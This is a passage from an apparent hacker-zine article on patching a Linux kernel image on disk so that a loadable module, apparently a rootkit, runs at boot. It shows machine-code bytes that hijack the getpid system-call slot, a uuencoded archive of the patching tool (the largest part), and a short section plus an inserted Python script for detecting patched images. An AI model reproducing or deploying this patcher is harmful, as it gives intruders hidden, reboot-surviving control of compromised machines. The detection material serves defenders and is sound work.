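    patched = relocate(TEXT, RELOCS, SYMBOLS, TEXT_BASE)
    print(patched.hex())
    print("call lands at 0x%08x" % call_target(patched, 0x0D, TEXT_BASE))
```

The stored addend of -4 ("fc ff ff ff") exists because the CPU adds the displacement to the address of the next instruction, which is four bytes past the patch site.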

--[ 5 - Make it autorun when reboot

After the above steps the new kernel looks like this:

[modified kernel][all zero dummy][relocated module]

But the module has no chance to be called, so the kernel's execution path
has to be changed to call the init_module function in the LKM. My method
is adding some code between the dummy data and the module, and changing
the value of sys_call_table[SYS_getpid] to point to that code. Many
programs (like init) call getpid when the machine reboots, so the code
will then be called.

char init_code[]={
"\xE8\x00\x00\x00\x00"          //call init_module
"\xC7\x05\x00\x00\x00\x00\x11\x11\x11\x11" //restore orig_getpid
"\xE8\x11\x11\x11\x11"          //call orig_getpid
"\xC3"                          //ret
};

All the relative and absolute addresses are written with wrong values, but
it is not necessary to worry about that. When relocating the module, the
accurate values of those addresses can also be determined.

So the final new kernel has come into being:

[modified kernel][all zero dummy][init_code][relocated module]

Then the new kernel image is generated by following the steps in the
Makefile. Now a new kernel patched with the module is available.

--[ 6 - Possible solutions

Deleting the /boot/ is the easiest way to prevent someone from
using this program without any modification. However, Silvio has shown
some ways to generate the kernel symbol list from the kernel, so it is not
a final solution. Adding a module that prevents the kernel image from
being modified is not a bad idea, but the precondition is that the system
supports modules.

When a kernel image has been patched, its changed size and checksum can be
detected, so some function could be added to fool the administrator, but I
don't have time to do that. If you have more ideas, please don't hesitate
to contact me.
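
A defender-side check built from the layout described in sections 2, 3 and 5, as an added example (not the author's program): it pulls the kernel out of an image copied off the suspect disk, using the length word that the linker script in section 2 places directly before the gzip data, and compares the result with symbol addresses from a known-good map for the same build. The symbol map, the sample images and the default of 256 table entries are constructed or assumed values.

```python
import gzip
import struct
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # gzip ID1, ID2, CM=deflate
NR_GETPID = 20                 # __NR_getpid on i386

# Constructed symbol map in System.map format; in practice this comes from a
# known-good copy for the same kernel build, never from the suspect disk.
SAMPLE_MAP = """\
c0100000 A _text
c0100100 A _etext
c0100100 D sys_call_table
c0100200 A __bss_start
c0100240 A _end
"""


def parse_system_map(text):
    """Parse 'address type name' lines into {name: address}."""
    syms = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            syms[parts[2]] = int(parts[0], 16)
    return syms


def extract_kernel(image):
    """Return (offset, inflated kernel) for the gzip stream whose preceding
    little-endian length word is consistent with a stream that inflates."""
    pos = image.find(GZIP_MAGIC, 4)
    while pos != -1:
        (input_len,) = struct.unpack_from("<I", image, pos - 4)
        if 0 < input_len <= len(image) - pos:
            inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)  # gzip framing
            try:
                data = inflater.decompress(image[pos:pos + input_len])
                if inflater.eof and not inflater.unused_data:
                    return pos, data
            except zlib.error:
                pass                      # chance match of the magic bytes
        pos = image.find(GZIP_MAGIC, pos + 1)
    raise ValueError("no gzip payload with a consistent length word found")


def audit(image, syms, nr_syscalls=256):
    """Compare an image with a trusted symbol map; return a list of findings."""
    _, kernel = extract_kernel(image)
    base, findings = syms["_text"], []
    # objcopy -O binary emits nothing for .bss, so a stock image stops here.
    expected = syms["__bss_start"] - base
    if len(kernel) > expected:
        tail = kernel[expected:]
        findings.append("image is %d bytes longer than __bss_start - _text, "
                        "%d non-zero bytes in the tail"
                        % (len(tail), len(tail) - tail.count(0)))
    table = syms["sys_call_table"] - base
    for n in range(nr_syscalls):
        off = table + 4 * n
        if off + 4 > len(kernel):
            break
        (handler,) = struct.unpack_from("<I", kernel, off)
        if not syms["_text"] <= handler < syms["_etext"]:
            findings.append("sys_call_table[%d] = 0x%08x is outside "
                            "_text.._etext" % (n, handler))
    return findings


def build_sample(patched):
    """Constructed stand-in image (filler bytes, not a real kernel)."""
    syms = parse_system_map(SAMPLE_MAP)
    table = [syms["_text"] + 0x10] * 32
    tail = b""
    if patched:
        # Layout from the article: zero dummy covering the BSS, then extra
        # bytes, with the getpid slot pointing just past the old _end.
        table[NR_GETPID] = syms["_end"]
        tail = b"\x00" * (syms["_end"] - syms["__bss_start"]) + b"\xcc" * 16
    kernel = (b"\x90" * 0x100 + struct.pack("<32I", *table)
              + b"\x00" * 0x80 + tail)
    payload = gzip.compress(kernel)
    boot = b"\x00" * 512 + b"S" * 512          # stand-ins for bootsect, setup
    return boot + struct.pack("<I", len(payload)) + payload + b"\x00" * 7


if __name__ == "__main__":
    symbols = parse_system_map(SAMPLE_MAP)
    for label, patched in (("clean", False), ("patched", True)):
        found = audit(build_sample(patched), symbols, nr_syscalls=32)
        print(label, found or "no findings")
```

Run it from a separate trusted host against a copy of the image, in line with the conclusion below that nothing on a compromised machine should be trusted.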

--[ 7 - Conclusion

Now it is clear that it is easy to patch the kernel image. If the host
is compromised, nothing should be trusted, not even your own eyes. Halting
the machine and mounting the disk on another host is a good idea.

This paper is just for education. Please don't use it for other purposes.
Sorry about my poor English and the dirty code of my program. Everything
would be better if I had more time. Though it works well on Red Hat 7.2,
there may be some problems on other versions of the Linux kernel.
However, time is not enough for the tests on all kinds of

--[ 8 - References

 [1] Silvio's article describing run-time kernel patching (

 [2]  "Complete Linux Loadable Kernel Modules. The definitive guide
      for hackers, virus coders and system administrators."

 [3] <<Linux Kernel:Scenarios and Analysis>> by Mao Decao and Hu Ximing

 [4] linux kernel source

 [5] Linux Kernel 2.4 Internals

Finally, many thanks to Silvio for the source about relocation. Also to my
co-worker lgx, who gave me much good advice when I debugged the program. I
also extend special thanks to Hou Hanshu, who helped me correct many
grammar mistakes in English.

--[ 9 - Appendix: The implementation

begin 644 kpatch.tgz
[email protected]"9W-77,J^^J<SLD60&@R/G4OE"'K\C5*"[email protected][[email protected]%1
MSO76/H`T<O?<$9,@2G[2/RRZ#G+PS.?I)[email protected]&@]%P."`/+-V_S:`9BEF!8"P2
M"X;#$<L*`;P9BUH!(_A\=4C_Z2#E#2/0K-?;F\%M5?Y/][email protected];49^I=(R\/*U
[email protected]&%BZW#"!);;'87#12F4F#OC:ZW^#;+)[email protected];H]A&./UQKEF97FE
M5>M-XU"E6#M<.K=<Z[[email protected]<@*<N;`BEC=&2?HT9Y^H=HP35-<N+E9:T
[email protected]%%M84P,S6RL\!L3L1:,QHUS!8$B&6,L-2]K"6J3._0:,>[C8QA$T#0YX
M/@+=/F=40>#9J)M0PAGPHE&I48=60";"'U`K#/=,I5HU%LH&2,&[email protected]/`
MVCZ,=GU35N#ELM^()(Q\&35E(ULM`N/?8>0ZB!X*!:FR(_56&Z&/)[email protected]
M'68H&-MOS.>2T.AM!_?L>4UE"=AWR2C`ZBY,0YJ7_2"G#1,`^`J$<[email protected]
MN'[email protected]<X]>PJB=4^DQC.Y/7M`=.2Z!`6T,=^J`$4*A6);F*I0P*53-H!>*#^8
MK:;&QVGHR%JEE3HH([email protected](B\`Y\)$X`4$FD8H1!!I`\>[email protected]%[email protected]=
M`&O<TP$6J[3/,0R"XU#QYM5RC;B[;[email protected]%]3S^'AZFGP]/ID9&1L9[X$DEZ
MAOW>[O3YC6ES?)^ND<SCP^W6O9M=HM7TG'NW.;ZW=\1BK)!#'[email protected]&K.;-2
MV\(@1RX?&QQ$Q%DR*_%X,-L'6D*:CQ%\[email protected])=IET91T6Q>>@'>9\K*MNI>%I
M*+CD!N4^,R.D\$^C4<>[email protected]@(T!%A-0Q*B'3&RS;KR\WBJDR(01>B
M]07:C=QRD!5S;@[email protected]>[email protected];]>8=^)[email protected]*4^=.1X[#)28`=I$#-1
M+Z6XD3YH=KSV3<9*-.2:_"H`[email protected]>XR^V"WW,W[4FO3YEM.\[email protected]]VZ>H\G[
ME(W\7):4,\J=+"F'CCM:[email protected][:<UQ2>@4[7U(.]G-<4GH%.U]2.O9S6U+RC0S>
[email protected]_0\JD5_XN22W:)[email protected]>14<'`P2,.<)/L+=A(9BHZ<5(,1=$9I
MMEQLG3,@U496+0)[&7BN8`90YWUN?W#PU7>;[email protected]%11V#50^[email protected]
M=QD_;#DX&"'(B6*["`N_5%]$HO3L-:+X='[email protected]>+UT
M:J?51E->ZEAA?'YN#O5J3\79Y,[email protected]([email protected]`<?A%PL4Y5J*,3/[email protected]>@0
MY]%&;PS7/7O\B%?ZY`M$92'S3-VM#[email protected]<ZF,$AMS[,5Q=DLW9.I$:ERM^M39
[email protected]*BU5F)9E_;=XXGH)5:P:#'K!<-CDW+E.2FY\Q*.V!"<6C:C+2M7:Y
M0+BK`_%H4*T+!0197JJDL[[email protected]#'\;<[email protected]`26\1T^RQ_($XI!K0DFX^IB
M<:7J4V%A+A<N'$D99E"K-]Q=;Q?=HV&[email protected]\34SZTPECN%;'<S<P2Z58'5$2
MNW58([5Z[0ZTX&M]XNYT+Y)D)CN=A*68"%[email protected]">1A^:-KK1USK36UU:">
MOO3E1NAI>E`H>.V%43+P%[%VC8_!RK[[email protected]#G9PI:*4#`FQQX)S+-:[(5K
M?TO,W5'*0IW!#\=UF$HYYZ;*DMWJ2AT/*[Q?:A:"7$\[email protected]?4[<HR%OP3W*
M.=107!W5;->VE,M-SQ3F9R92DR(4YVM*C=(([email protected]#VCK]WKJE1.V9;5!VOM
M\W,(**J_;LKQ`,*I([email protected]#0'_D)>RXLYG<Q-B^XI/<&+AOZM
MR%5.43XG^,[email protected](!.^99RBZZSN93HHW.U-M>OL9RHES<13D*%<1]K]69CL,+
M3&O[IRQ$RLS"L>,X\'ITB7X6:5XZ-6=E5NMGC`6\9M&-#[email protected]*G'HI757<$Q4
M+H*ML*AG]NY9"<;[=6HIZ[[email protected]+"H`T#OZ2CJ\3K1M].NVFP%(7!58JRRN]
M'JL:MLRC9+?0FRP<GTO#ZAPVC4.'C.`(-GB\6?%[email protected]`<1C2),C94JG3
M0!&[email protected]<[)",<JDJ>@UH\TC/@%B36JP1C_7#`W\TF;M+[5H:37L;$ES2
ME,3U]HX4;5TIY#JV<:)@Y4T^].I"IIQN[;:M:UT,[email protected]$W&XL^?ZL"Y9V,?1=
M+>"6QY8]'SQ2R<:4142)G-5RL08X^]G6K?HE^][email protected]^HJM6\_J<L)!1[;6L'=*
MTC,3PS#RD<'!X>%AUT2,&%0P8MQYIQ$>Z4;-G\RF;%3\;;[email protected]`YF>F9P=
M^48&-RP;[email protected]?P0VL/&D4H`S^"A$;=:Z6`[email protected]\AFNX4/43J`7D\E;Q+
M%-WCY>*I;JA!A")=*;0#58GZ2AN#J93C[>[email protected]"A[O)@)-]W<>]&8YG$S&OL>
M,/*D"`.J.F)HLJV"GE)IVJ.$`MKLD=>GQI4A+>><N%@K%F>`!V=R?F;<?<[email protected]
M#'R4U0,[email protected]:D(Q6=LQH?(WQ/MMA>.I.2(PBCWMIBJ:]NRU/"-?$[][email protected]
M=\5([email protected]!<%SYK.U!.>^H5M[`5C>;]-\E[Y5QEO_9T!5J,`AA\S3SAG)?BAA
M?Z8>Z\:Y<+Y;[WIHTJH;9\JW5JM&M8R5`^[email protected]<3IU-J5*FS7I\M0-LRO,\ZL
M-]=+*>S2"N=83X(Q*S4)E4)(DDX8[]()22ETZUK<[email protected]`FJ%.A2RO`J9],B!
M$K$C?F%<\T$PPB:[email protected]#G7JI3\L604V)'6O6XTY7U0%Q8\*/B,[email protected]>&
M&!]\FM$=,$("K_].0%[email protected]\>T]30YD%OV4;P\VY]1)6!V-*,.
MTDYFU)92.YA2#6?[<ZHA;6NF`#YK^W*Z5/B&[0]PIL:[email protected]]FQ1TP:%]WZ74O
MP<D8+YIZLG.V4JW0P\J>U;.9/[email protected]@V>F).74GA?UM2&47J2KM5KFZI.O_
M)77W#*90I\D,>LIR^61^7GG*\)$T'#9:]G/61A/C&71:([email protected]/V9'8N-95+
M5J2'#D7[[email protected];2[5CF!(*2D?>EH6;==;%0KNX+%N2JH;EE[,Q=6I0*1Y/C)_;
[email protected]*1M+H1IV;SSI[#@L.6W3:--!3R-*M]1VCIO`WT]SI/V#[P2!=>#W?XA.U?
[email protected]^%'.BR%6D8=,;W)0`B`-W899VOMXMBW=\2"6_$)1QJ`WP="AV<[N%#
M,^*D5AB;CYWNW)E=3;2Z7&,>U/1,.F^[K#4BH#W$6,+/[G2SW"[email protected]#2I;G(:#
M,IL!A<J,:J9"([email protected];/JP`(_)CA9Z3BC/[email protected]`L^3*"+Q_P2AV4:ZOJ
M82U#PHK%A>I&[email protected]=F9\:M.0%"ZW-A<[R,O#-6"]3,V#E4R>X'<NQ-QBK%.9`
M`HI0B&L/UNN/[email protected]\Y<[email protected]&A^5EA7_;Q*],2/INQ-_`C>?.PAHF(OX4^Z
[email protected]=Z`:I<:[email protected]>'D4>>.1%"UVRH;9Y"A2ROU5AG%.-Z<<+^C872R^"KT
MDF?23G==%^%G&6B%]MYTL:M#\[email protected]:?7>%7G:`.G#S\MPXT>4)-<[email protected]#
ML[LDE?>HT=6M)7>W9&?TJ4`1&92S?'(J/7%B&/;ND<%A5[W&'09EC_!"[email protected]
MFL7:,MZF.5*F%[email protected]>+MNUT!'DO,GTIET<NXDJB[VLEADM>>@]W5)[email protected],#!C
MH;R$RKSG_,;2/P-'3[E1[[email protected]=*)F?=53'<J>I([email protected][^.7*'2I$^
M.\+$AV./>>>[email protected]=YDA733CW(:)U[PM0K:V49WID>7K1_6Q7U=<LGZYXG\$K
M!,VNH\![7)96&'P)04=(>\W/"K14:PNHP\Z:IZ[8.6M?_O.:[email protected]`;=2UWS\@W
M5DJ!REO)7D=*Q3/."'1^T0T,>H.3F:G"D60.[\>:KBG5>%V%-^[email protected])L^
M8,?-F0D9VB,=[,[email protected]?^%07W*\@]UKN/8<US#3KT;F5A<19))I);.%
MHM*R":`-K8NBM2V7=FV3I5W;[email protected]="!`K\5=V]'BQNV95[>QU?(F4/6R
M8G7JNB_<,``NE6IX61*2(Q2B9E(92AI^B&^'[email protected]&4YYS?YNIUFOGO=H_V<%&
MP\[email protected]_59W4=QYO6VJ2;=-56P`[email protected]!PZ:D9?$)O:B23\)L+P/S+L*C=9HHD
MWK1K>)KUX"2G4KDWBADU1^'.C49QN6Q?8][email protected]@1B*&&E4MQ_ZNB(!:S*3
M3-6I=,TMPTB8AJ4E5`Q/EWT`[email protected]%T7PX0][email protected]/:\W^,%6!OT)K=
M,*[email protected]#C/>"RX]`V4R([CMTK$BVD`S[@T(-(%[ATPP<\+GRK0\?]@:=F\]`7
M82\G^?(>PM-41[8]T]0A-=/1;4PT([email protected]'=O&/"."/<_Q+::YBU*SDY,BQV3P
MPN)P1L`.^J%DQSWR2Y^4+G2RE=NQ>#9G*X;IP5=4N#5G,5C<S5H^.P?#][email protected]
MU'8KQRY<D"'[email protected]@V(S&+3^/37ZME#@!/&$AKW!H4-RW3-L!GJ!9J9
ME`0UMK55,HX2HL:6FZ47<SZ)&Y2?>.C4Z&YKV3DA.'&Z-I>%/A&>[email protected]/UIS
MO&@A#6UGT6NX:H[18FB!99)[email protected]@K,HEZ6:1VS\?'6R"!CFQYL#.NI<+WQ
MY;K7%;YDHG8SZ2/X*3_RF>LW6W1WN:[email protected]+N[+]6,S\Y,9M+C>:<:2]89
M4!5-6%O5,IO%I[`YK1:ZTW*TTBJ5J]5BK5SOM.3K13YA7'A,QY-SDW([email protected]\>
M1I=:.-MW/#TJ2AU+S>1S&[email protected](#TFEZ+^'R5/;@3U_![\[email protected]\#Z76SX=
M`[[email protected]_99^7][email protected]/Z>J6W6T82(_>DF>,*R"/TRI>0V-WV1EEJ.X:
[email protected]*RL\`[:=MV,;L'HGP,RXUV<6',GM9SVYE468#;\FPV*]`$<']+PLJI
M+U>I[V&V#*^_4:&5&.U-X9\=4^[email protected]?1&O-[8\W\16]7D86F[82(X?PGG-N9S&
M6WTGA.FT?<[email protected]//L.)*2I'RTS]3&\XDC(`RD>)J>SF!U?9.?.IN63&;7.M
[email protected]*&7..CF7,[9*9->"[email protected]<#)UJQ<"%N<IGD?3F9P&-TVUK+]%LKO#K1.!;1E
M65UD<.9NLV=L'KF>[9;K6??2]%[email protected]?AB7,U3[OJ[NQ<9D)[email protected]
M5-K%YN3<)A'5R%>TA('??"[email protected]:.I0BZ?/)K5=E?6??)05ZM=7&WXX:7'
M+XF[>Q)RJG#D$^SFO:N93J,;V#NBL'M$6!=YAIW')3U&[email protected]:#+KZ5;4PT3-
[email protected]`GC_9JL=%UE]F^E"]5F3%_4:6O.D=0N5[.V0)Y6JZ%8IU.I'_OJD2P
M-\RG09+DDW-Y`M;?>,[#@KRG4P%[email protected]\5/(@SL_GLK([$KSSI4A?YU=%3W<"H
[email protected](JQL=>74N.7<2A'DVDQQ/'>6OC3GO/]-T1\$`0BM(?#;S'+1SX?=M*7)5
M=?^+B.8*]N9\>J8[&G>[email protected]<((DM&JTNP#VP)1'2HO%I(ML#Z+J/F?;;4CP(
[email protected]@K]2]36>AQ[Z2JWRFSIRF3*:1.),>!B,D\6:[email protected]#M1O4+5C`&&)C
M[LP^PI'\47H-:FH*/B9`(4-V3"7[\.39?626"[email protected]:[email protected]@VN+W,Y;RMZUB%A
MSAP-`RN9L`>-8QGB4_!0SSJ.IC.9M%-%R"`[email protected];09KW3!H3>79B?.9Z>
MF7#[email protected]_7SM3H0G>Q'(@^-F,3L<(8M-KS44R;8+.94OMGE7DR#[G:!W\L*-.
M,+VKR<\?R3F5)+"2C(3S;<.Y^,=G25$-3L_"+N$8;[email protected])T.'KO
MV-^0Z'D^[email protected]#*S,U,80F/SPZ\-_H9YC+AA:>#1<"]P=>8:#/4^<GEQU-%S
MX\/]8&([[email protected]'A;[4$]R.%</!B8;I&I\'I_?TSV8+V7E\C<XZ]6P6;T.73AF-
MWL73:;14!7L`Y,9G!,+L`7%[email protected]"L'@"96?*1=I623QB?$F_3)RQ#MB]/1;9V
[email protected]:GVQ`PI+Z7EI`X[][email protected]')#=VOL[&`Y&`\%8)`[email protected]`X`O!6.!H)&,'G
M[8`V<PB4V\[[email protected])".K!R9U?1*7QT5O4K$?[R*0%UM=5>=)>TSK4.PC^\HH`%
MP;$];]^SA]_55,O%6J?AJH&A$.8?>A;^X7YD_:,W[D#]>[email protected]?]@
M.!RS8B:N?Y``_[+^?Q(_[TAE)OOZ^NQT7V!WH$\KOU$28?K_<&`@<%[email protected]!]__
M_O:OK?_/]4<8&K+^W*[QX<`!4%[email protected])`Z_VTW^O:+^PI`[email protected]@V,I?>$X.'%AH
MJL\4^*[email protected][email protected]%%Q42_=IOW=I^7E(?`1^7RU]Q/KVR1CT^OHA\4:?^C;[V>V!
MVNVJ$=/]!/'S6JTWPO__BY;^:0U^'Z2#[email protected]<,B3'O>DISWIP&K][email protected],"
MV9C=6:`\[email protected];-I"0%:"[email protected]\`5RL0Y!`('^/IJ`TT.!=X)H>H;L,=`R/WX>X#G
[email protected]\(>01^[X)]YQBF8<!OD=\_Z1^E_U5:I7\8^0\R'Q1`3?Z'2?['0O\B_W\2
M_[(K_0.IL5^GV6G^$6#LAS:&H6MWF]^`KBTB/*+#[email protected]:[\"S4X\]L#0\%7,
MYO1M`'_SZV_/#[[email protected]/78L\N#S#_W+YO'.;W4&NP[X^!9&/[SGP3!V5/_B%H
M]]"%_C_![3F[<>;%3):[email protected];T(E`>]]Y)DQV(P/[email protected])/X`[XI`4)
MRU^\C!0]_S:H?.)=/[email protected]//[[^ML?[@5S9/B8GD_X]O_I#F-J_#7YW_7_">OLH
MN.O/@HA`H?*N&Y-[/]X_#N/XPOH?(1:TV`^]R<-X>":_^#5([email protected]*+91'H
M_MD7+C_X9YVGL7KSSX!([email protected]<(X(GI5VV,];^L?0=UX4+[M;1\1P`2H:\@
MC>\>.K'^^2\^`6F#@/]]YRN0-X2,CTS_X#5_?^4*,C#[email protected]+9M_#%-Y
MW(N`9(\S]UTV+[X)8-:^?N/\^[email protected]+6.GW_=-/SZ(++JL1R,(8C\@(OO$RC,
M<A467G[[email protected];,`/Z\]@[MIC`V-O&PHV'T69L;[Q&EA]EPMKSY;V/E#%=CXV
M+WFH__K))"R+F^_J?./^MP&K0#.=EV#]'R(6NN<&[email protected]`8`O`2$]^&]8R
M&HCRS9%[email protected]/W(G[G0\]OR3T_*Q-S]_9Q_3\$N:N71H`[-._N_Z]O1^_\[email protected]
M9^''Z+2]=O$'=YW[SJ<>QEJ>>[email protected]:'K__6=S)_M53]S_[[email protected]
M\-97'-N85]6L/=OWKZX'/MV7W?C#9R`/=X?+AR'C6F3_F[)4A'R<[email protected]"E*\]
[email protected]_VCI<SPON?H:WIVNS&OX&_S(MKCPY<OHHF^DUOOO]1I"'2TN#S`'.L,/':
M3MWBWZD;67_:N'2MMVN[3G_Z_#MI[P(^1QWH6VM?O7K][email protected]]<N_?WZD]AD
MP^=1E[ZX]^/W'>99WO_DDWV>/7:K^?WB->[[email protected][WV]"_^/I3L!7NO]"/A[;@
MFUU[LJ_UO2>?14GSS/5['[email protected]&3O<WVO[*G>YJI_:MY6IWV?Z_/:?]\@-M_
MK/\36"_UX=N7S^Z$OTI=#;[email protected]]*>QX7<\\LVKURX]`[email protected]>`PVW<:?<
M)_)+:]E$K6=X[\]/_Y`$#3#*R-_17S?A"7M0&,[email protected][email protected];\%"J2_?L1O%O
MF`$-8,!A8,#.2U=0X=SXUAX:]*'LQN]_!]EP8/WI)Q\)R/X.#[email protected]+YRE
M_^FB%+7D.6P.5=D+_>_*;[email protected][B17\!&?I$;"6<[email protected]'L])E,-/H\R=
MI8?=\O?!+W?NE/:VQ4WO'G!/:OMS*/=Q5OO6]WWAFW?APMB)?+QSP&][email protected]'S$
MU<&S!FN$)V[MZ5V=P8V/[email protected]^=;U[P(-KMVX_%U(O(S:6WNZKWT-&4HN#Y(^
M<+*/;_S1#WE[''CPR^WKCFW<[email protected](Y-UV^\]C&*UY`IW20UM<&VH^>?S'U\?M7
MG[[Y_'[email protected]'GDZO?V;MZ:O/_-TZ97P(`38:`Z)@G'SC)53FS&^8?_P[OP:S
M^?;>^[[_*^T]*U_I$^O7H0%(H4?BR9?W>SCV1E7A0\"/[email protected]\`RV/&N^#?
MAXWV-2NO1.0_1_L29>V"^D*8]?N0]5W([email protected]>)Y[\I.0054FJ*[[email protected]#VD\U?U
M*KG'[email protected][email protected]]H91>(_(RM$7YB[8H_S:D<%`[email protected]#^V`-_[-GW
MX?Z]#[S;N\1Y!O9^[&8U!5=O_`;\[email protected]@>K?A2:<2P)Z'>CG&VO]-*F#
MEUR-#NW#9M<N]S5?Z4^D#"HXE_M:7[WO;4/7!-JFJ[[email protected]=)R[O5>.'
M'%CT_P/P]@3:M_O/OH8WN/'5W83Q)QM//WOERH,7VQF4$2]][email protected]\CEUX(X
M1_O(OJRW?X.0*:R(.?#[email protected]:7_^L"^SE+FHJ*;B7S\^AW4Q/-\I-&LH^&^7:
MYH?Z/XAPZ[LNP=[8?_[_)^1.P&NZVCV`G[4R("?'$82TPA<[email protected]`A"!O,8
M)!'$4)^9(A+S%!=M8HR::[email protected]_I"BM4B*AAA)#E*JQ^!1UV]L*JBU7#37DV^O=
M8$GEN%[email protected][SIFWW5QB:_1O*>X%'%[email protected](GW)U\8.V[+O<
M5'+><2F.1AR?^5/_XUF;_(R">[email protected],*UYQI3V23QH$7Q\4Q_X9%6/?-Z\5*+
MO%5;XL\,SYCV+<-49:97Z-/8EM55RS/="[L;NZ[+0GN'^=],[email protected][.J`#(
M<>9X%CR77)0<X*D>W81>BCB36C;#5\9$G)GXO+_:E\:6&"]JC>[email protected](W
M4JT+71MGN'K$1-R8^%?F:36^1ZJMLZ391K93QR-(P/&`[email protected]^+<,QM!K_JC.
M)0&G%_P?X\Q3I](BFWKQ8NRV(W[&[email protected]'0UNK:LKF8,J?Y?JY'2Z,M"]PS1
M/[email protected]:?;]LD\KOQYJ)B;_"@]),:$JXJ9-0N%6`U3FF'+"MBVPJX%@+MA_K
M:'^36NW"*L9>;[email protected]?9&;^CD"_I[DL:FI\4^V<[email protected]>V[^L7MEFWAB!TZ:';!1
M!_[[email protected]+9QL'-?CYO5:9$QMX-EP<D#9D<EP+K\N*NI=F&?\/7*0
M^GFGH0=O5-_\X'#'R47I=XS]%Y%OC[[email protected]!V,S!3;R%[email protected]*?5;]"S
MU95BK`/*L*("-[4EZA?S)9NS0G-+5',CS.:*6S)V6(&+^GN_>[email protected]_:+Z<
M_#^9ES$?<]?WX7<UI;?`\&.)+*-<'SP1W-!LIPPM^[email protected];P2_`YOL+
MJI95MH&;@<N#>X/MX`[email protected]>"1E60[V`G\[email protected]@^"[email protected]^&"8#%HYPR3$8L#<%5
MP%W`5<'CP>;5L`S\%[email protected]^&WP=7`U\'.P>1_P\5"N#[email protected]%.`[email protected]>`
M]L]Y*^V?GZW4_Z=6ZG\Y3^5:8%]/[email protected]#F;2C!D\Z3D>!`\`QP$_`:
MOMI&Y\!.&YT#)VQT#MRRT3GPU$;[RJL\[:N&Y>[email protected];[\I+!K<$3P)'@;/`
M[<"[email protected]#CX%[@&^`>X,[email protected]>/!9>W*">#JX$1P$W!?<&>P^4Z^P>#^X#1P,[email protected]
M+^77,*O;F<.MF)_5T+?O65-?S_=W,HZP>M5:=([email protected]!QX"#P2O`34NT<ZR6
MG:[email protected]]:7O/]=5G/NE'F:O]*!/97Y\_UY]=1RS3-UF?KSB`\M',[email protected]#:!E
MK0/)+9BG,A?QS"#]>L^PNGT(>[email protected]'Z95W^[email protected]?K,FF'4_P(GF>#AE!G$
MO(AYWW#]LL-'4/T,<_I(?=Y[%'N.,[email protected]/,HO1Y`ZC]6TN9O733C)3QM)Z
M.U7Y'[email protected](?!_<+I7RE=/(LYF+)I$S)[/\%/((YBW,%YEK326G,1<P_\7<>1IY
M8>,=\W7FZ'3R:N9"YBISR6N8"[email protected]]_HL\F'DC\W?,[email protected]<S9S'>9`^>3YS*?
[email protected]#R9^1OF6N^11S*O9K[.W#Z3W&L1^2ESW\7D3YG5'YSWLOK*)4[&E*5T
MS<8NU6>6L<P1R)CC]6\L__,R_;*I6;3LYBQ]IN]RRF0LUV?^_H`[email protected]
MV.NLE>26*U7>G(?T`9OSD%2P^:SL"-A\=OIOL/GL]`G8G'O85RF;S\[email protected]
M]IQ_O3[C_A%EFGVDS]QG&=^/]9G#'U/F=R>9D(UL'KY1G[[email protected]<W4?XN<Z7-
M?;[email protected]+FZ^(BL#G.AMB4S=?%@VSZ=OSMU$YONSYSMP)E?+S([;TH?[DB>7DE
MPR+T^94M]/57D=3/X-;Z3(LVE!G+_%$;[email protected]"CU\ZLNWM
M1*[6E>W_[N3;<62?7N0SS.Z]R;W`[email protected]?*OP$'@O\&1X$;Q"O/Q;>#.?K<,Y[:
M60<V?T]]G-6#$I3-YUWQX/`[email protected]?(O$_7[[email protected]?VK?W^^@S`Y(HD\F\EYGG
M?9^OL/H;)YG``51/8I[/_.4`M5[S&[email protected]<N`;X'-WQ_]-4"_'S8-U*_WVX'L
MF$9C^[email protected]\_5FE>EPO8/#IE.;.YEKSB!W9<X&[RK1A\,S:+WW6+[>3#K_8V92
MZM=[#?(!X/M[:<QZ!3;?`U8^[email protected]\OA"PZVN!JN#PZ!.WHX>`@\E>\('@I/
MF_J!)\!OM,:!I\)3G[[email protected]&?"T9GD.]>VS'.J_USZ5V6)N+WB;17V`,`G\F45]
MHG`F^`[email protected]`?>BWH"?,.B/I3Z`.PNC-N]Y3FXC!AIV"U7&%M>">:W50UO
MHP>)[email protected]!(A$]F'F$>`<]3`Q##Q?C668V>J18B1XEMJ+'B>WH\6(WJ^>P^E?H
M"2(?G2(NHR>*^^[email protected]>H8V)@*2\!WJ:*"]IV2KH&>)M]$Q1&SU+
M!$EJ/PP]7T2A%[email protected](5B,'JIR$(O%RM9?0.K;T1_(#Y'+Q$Y+'.894ZA5XOK
MXM"?B4'HS\5X][email protected]?Y2K$/O%5O0.6([>I_8B\X3A]#[Q6ETKOB6U2^@#XH?
MT%^+1^BCXAFK2U>J5T0?$]70^:(V^H1HBCXIHEF]':MW09\2/=$%(@E][email protected]&
M)-H:[email protected]`'BZ&&4V'[email protected]%Z*(R/[X,;"\=G5XY:Z,\=X[^%Q?LAH-C+\M2X
[email protected]".E>^BV\I)Z';R*W1[>8[5S[/Z-707>0?=3;YF=>%"]?+H'K(R
MF%R"'BY7H$?)M>C1,MNPW*^NKS(PY%KWPW,G.(<K0;VL5/<[email protected]_,\`.H>
M4`^&NA6NA>;%5J]?HB'C*=4]H0O8)LTG6R6OW^[email protected]_NGXGR/ARCGY.
M37($>K-4\^31L,]38+^[email protected]?"[email protected])3H5C]QXX33J[KSKFVP'%[email protected];'98<\X>%8
MA._!NW$\.FJA/W>,_V+8<>QB^`D<Q][email protected]>C#T\EC=?/9`7T2UD%_4KV1[^6
M[KR8GOD>"QL\\A`XD%5$7!0%=(.BA(>O9)>%74(0]!#[email protected]"()+Y$D0I"`&$_.
M_P7[/.%E3-=<R]D]A,>8KK_&V4;"&?8H88_IO2S+=J%XGF-[[email protected]!&$
M>!5;[email protected]\=IG!<S7A"EM/.&9?(EQE7R-<8_<2GF;?(;R:;27<8(\2;K.W"7?8
M>5'`\;&(_Q7S[5,0_]LBJ$'.0?SOF'[email protected]/B7N%_7$+^">TH'\:N8>\PC?GW1
M,1S?A#*\@7O95Q&_N>!>=HE1UWR*[email protected]<Q];SA/[!C9#_KV/JS>^3UDWJ
[email protected])^,?L9,+_Q,XD_!3[".&?&+I]FD6$GV73A)]C\X2?9SH?>(&M)?P26T?X
MG=_NYVC][.9<2OB]SM6$#[email protected]'?\&[email protected][email protected]`[email protected]/$:P
MSMJ$SPZ<#?:V];/>T`[email protected]`_RYS-I!]UJH7[E[/[email protected][S2=\YS:"O-.AZ
M.B\3/LEYC?#)CLXA3W5^[email protected]"ISLZGSS3V8'P6<[[")_ME`BO=#Y*^,/.
